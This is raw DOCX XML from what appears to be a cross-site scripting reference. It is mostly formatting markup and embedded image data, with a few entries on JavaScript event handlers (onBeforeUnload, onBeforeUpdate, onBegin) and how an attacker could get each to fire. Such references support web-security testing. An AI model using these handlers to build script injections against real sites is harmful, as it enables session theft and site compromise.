      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>tricked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>into</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>printing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>use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z w:val="16"/>
        </w:rPr>
        <w:tab/>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-36"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>function).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926"/>
          <w:tab w:val="left" w:pos="1927"/>
        </w:tabs>
        <w:spacing w:before="74" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="464" w:right="573" w:hanging="27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603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50800</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="895350" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1132" name="Group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5350" cy="116205"/>
                          <a:chOff x="1930" y="80"/>
                          <a:chExt cx="1410" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1133" name="Freeform 1135"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="80"/>
                            <a:ext cx="1410" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3319 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1410"/>
                              <a:gd name="T2" fmla="+- 0 262 80"/>
                              <a:gd name="T3" fmla="*/ 262 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1410"/>
                              <a:gd name="T6" fmla="+- 0 262 80"/>
                              <a:gd name="T7" fmla="*/ 262 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1410"/>
                              <a:gd name="T10" fmla="+- 0 262 80"/>
                              <a:gd name="T11" fmla="*/ 262 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1410"/>
                              <a:gd name="T14" fmla="+- 0 241 80"/>
                              <a:gd name="T15" fmla="*/ 241 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1410"/>
                              <a:gd name="T18" fmla="+- 0 238 80"/>
                              <a:gd name="T19" fmla="*/ 238 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1410"/>
                              <a:gd name="T22" fmla="+- 0 101 80"/>
                              <a:gd name="T23" fmla="*/ 101 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1410"/>
                              <a:gd name="T26" fmla="+- 0 80 80"/>
                              <a:gd name="T27" fmla="*/ 80 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3319 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1410"/>
                              <a:gd name="T30" fmla="+- 0 80 80"/>
                              <a:gd name="T31" fmla="*/ 80 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3340 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1410"/>
                              <a:gd name="T34" fmla="+- 0 101 80"/>
                              <a:gd name="T35" fmla="*/ 101 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3340 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1410"/>
                              <a:gd name="T38" fmla="+- 0 241 80"/>
                              <a:gd name="T39" fmla="*/ 241 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3322 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1410"/>
                              <a:gd name="T42" fmla="+- 0 262 80"/>
                              <a:gd name="T43" fmla="*/ 262 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3319 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1410"/>
                              <a:gd name="T46" fmla="+- 0 262 80"/>
                              <a:gd name="T47" fmla="*/ 26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10" h="183">
                                <a:moveTo>
                                  <a:pt x="138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89" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1410" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1410" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1392" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="138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" name="Text Box 113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80"/>
                            <a:ext cx="141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onBeforeUnload()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3" o:spid="_x0000_s1299" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:4pt;width:70.5pt;height:9.15pt;z-index:-17640448;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,80" coordsize="141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">
                <v:shape id="Freeform 1135" o:spid="_x0000_s1300" style="position:absolute;left:1930;top:80;width:1410;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="141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PcAsQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2sCMRC+F/wPYQRvNatCKVujFMEHFIpd9eBtupnu&#10;BjeTJYm6/vtGELzNx/ec6byzjbiQD8axgtEwA0FcOm24UrDfLV/fQYSIrLFxTApuFGA+671MMdfu&#10;yj90KWIlUgiHHBXUMba5lKGsyWIYupY4cX/OW4wJ+kpqj9cUbhs5zrI3adFwaqixpUVN5ak4WwXZ&#10;V3Ua/66+D+XxeNue91uzLrxRatDvPj9AROriU/xwb3SaP5pM4P5NOkHO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T3ALEAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m1389,182l21,182r-3,l,161r,-3l,21,21,,1389,r21,21l1410,161r-18,21l1389,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1389,262;21,262;18,262;0,241;0,238;0,101;21,80;1389,80;1410,101;1410,241;1392,262;1389,262" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1134" o:spid="_x0000_s1301" type="#_x0000_t202" style="position:absolute;left:1930;top:80;width:141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6im8QA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywi91Y1tkRqziohCoVAa48HjmJ0k&#10;i9nZNLvV+O/dQqG3ebzPyVaDbcWFem8cK5hOEhDEpdOGawWHYvf0BsIHZI2tY1JwIw+r5eghw1S7&#10;K+d02YdaxBD2KSpoQuhSKX3ZkEU/cR1x5CrXWwwR9rXUPV5juG3lc5LMpEXDsaHBjjYNlef9j1Ww&#10;PnK+Nd+fp6+8yk1RzBP+mJ2VehwP6wWIQEP4F/+533WcP315hd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uopv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onBeforeUnload()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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>would</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>need</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>tricked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>into</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>closing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>browser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>cannot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>unload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>unless</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>spawned</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>parent)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926"/>
          <w:tab w:val="left" w:pos="1927"/>
        </w:tabs>
        <w:spacing w:before="74"/>
        <w:ind w:left="1926" w:hanging="1737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654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50800</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="895350" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1129" name="Group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5350" cy="116205"/>
                          <a:chOff x="1930" y="80"/>
                          <a:chExt cx="1410" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1130" name="Freeform 1132"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="80"/>
                            <a:ext cx="1410" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3319 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1410"/>
                              <a:gd name="T2" fmla="+- 0 262 80"/>
                              <a:gd name="T3" fmla="*/ 262 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1410"/>
                              <a:gd name="T6" fmla="+- 0 262 80"/>
                              <a:gd name="T7" fmla="*/ 262 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1410"/>
                              <a:gd name="T10" fmla="+- 0 262 80"/>
                              <a:gd name="T11" fmla="*/ 262 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1410"/>
                              <a:gd name="T14" fmla="+- 0 241 80"/>
                              <a:gd name="T15" fmla="*/ 241 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1410"/>
                              <a:gd name="T18" fmla="+- 0 238 80"/>
                              <a:gd name="T19" fmla="*/ 238 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1410"/>
                              <a:gd name="T22" fmla="+- 0 101 80"/>
                              <a:gd name="T23" fmla="*/ 101 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1410"/>
                              <a:gd name="T26" fmla="+- 0 80 80"/>
                              <a:gd name="T27" fmla="*/ 80 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3319 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1410"/>
                              <a:gd name="T30" fmla="+- 0 80 80"/>
                              <a:gd name="T31" fmla="*/ 80 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3340 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1410"/>
                              <a:gd name="T34" fmla="+- 0 101 80"/>
                              <a:gd name="T35" fmla="*/ 101 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3340 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1410"/>
                              <a:gd name="T38" fmla="+- 0 241 80"/>
                              <a:gd name="T39" fmla="*/ 241 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3322 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1410"/>
                              <a:gd name="T42" fmla="+- 0 262 80"/>
                              <a:gd name="T43" fmla="*/ 262 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3319 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1410"/>
                              <a:gd name="T46" fmla="+- 0 262 80"/>
                              <a:gd name="T47" fmla="*/ 26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10" h="183">
                                <a:moveTo>
                                  <a:pt x="138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89" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1410" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1410" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1392" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="138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" name="Text Box 113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80"/>
                            <a:ext cx="141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onBeforeUpdate()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0" o:spid="_x0000_s1302" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:4pt;width:70.5pt;height:9.15pt;z-index:-17639936;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,80" coordsize="141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">
                <v:shape id="Freeform 1132" o:spid="_x0000_s1303" style="position:absolute;left:1930;top:80;width:1410;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="141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FCdccA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRCF74X+hzCF3mpWC6WsRikFbaFQ7KoHb+Nm&#10;3A1uJksSdf33nUOhtxnem/e+mS0G36kLxeQCGxiPClDEdbCOGwPbzfLpFVTKyBa7wGTgRgkW8/u7&#10;GZY2XPmHLlVulIRwKtFAm3Nfap3qljymUeiJRTuG6DHLGhttI14l3Hd6UhQv2qNjaWixp/eW6lN1&#10;9gaKr+Y0Oay+d/V+f1uft2v3UUVnzOPD8DYFlWnI/+a/608r+ONn4ZdvZAQ9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BQnXHAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m1389,182l21,182r-3,l,161r,-3l,21,21,,1389,r21,21l1410,161r-18,21l1389,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1389,262;21,262;18,262;0,241;0,238;0,101;21,80;1389,80;1410,101;1410,241;1392,262;1389,262" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1131" o:spid="_x0000_s1304" type="#_x0000_t202" style="position:absolute;left:1930;top:80;width:141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kBA8MA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/6HZYTedJMWpEZXEbFQKBRjPHgcs2Oy&#10;mJ2N2a2m/74rFLzN433OYtXbRtyo88axgnSSgCAunTZcKTgUH+N3ED4ga2wck4Jf8rBaDgcLzLS7&#10;c063fahEDGGfoYI6hDaT0pc1WfQT1xJH7uw6iyHCrpK6w3sMt418TZKptGg4NtTY0qam8rL/sQrW&#10;R8635vp92uXn3BTFLOGv6UWpl1G/noMI1Ien+N/9qeP89C2F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kBA8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onBeforeUpdate()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(activates</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>before</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>updating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>object)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336"/>
          <w:tab w:val="left" w:pos="1337"/>
        </w:tabs>
        <w:spacing w:before="160"/>
        <w:ind w:left="1336" w:hanging="1147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705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525145" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1126" name="Group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166"/>
                          <a:chExt cx="827" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1127" name="Freeform 1129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348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 827"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 827"/>
                              <a:gd name="T10" fmla="+- 0 348 166"/>
                              <a:gd name="T11" fmla="*/ 348 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 827"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 827"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 827"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 827"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2735 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 827"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2756 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 827"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2756 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 827"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2739 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 827"/>
                              <a:gd name="T42" fmla="+- 0 348 166"/>
                              <a:gd name="T43" fmla="*/ 348 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2735 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 827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" name="Text Box 112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onBegin()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7" o:spid="_x0000_s1305" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.3pt;width:41.35pt;height:9.15pt;z-index:-17639424;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,166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">
                <v:shape id="Freeform 1129" o:spid="_x0000_s1306" style="position:absolute;left:1930;top:166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63R8IA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPy6rCMBDdC/5DGMGNXFO78NFrFB+ILtz44OJyaOa2&#10;xWZSmqj1740guJvDec503phS3Kl2hWUFg34Egji1uuBMwfm0+RmDcB5ZY2mZFDzJwXzWbk0x0fbB&#10;B7offSZCCLsEFeTeV4mULs3JoOvbijhw/7Y26AOsM6lrfIRwU8o4iobSYMGhIceKVjml1+PNKNgv&#10;19lk87f1FxmfJ73rZYk6PSjV7TSLXxCeGv8Vf9w7HeYP4hG8vwkn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rdHwgAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m805,182r-784,l18,182,,161r,-3l,21,21,,805,r21,21l826,161r-17,21l805,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="805,348;21,348;18,348;0,327;0,324;0,187;21,166;805,166;826,187;826,327;809,348;805,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1128" o:spid="_x0000_s1307" type="#_x0000_t202" style="position:absolute;left:1930;top:166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o+Q8YA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF74X+h2UEb3WjB9HUVUQqFITSmB56nGbH&#10;ZDE7G7NbTf995yB4m+G9ee+b1WbwrbpSH11gA9NJBoq4CtZxbeCr3L8sQMWEbLENTAb+KMJm/fy0&#10;wtyGGxd0PaZaSQjHHA00KXW51rFqyGOchI5YtFPoPSZZ+1rbHm8S7ls9y7K59uhYGhrsaNdQdT7+&#10;egPbby7e3OXj57M4Fa4slxkf5mdjxqNh+woq0ZAe5vv1uxX86Uxw5RsZQa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o+Q8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onBegin()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(the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
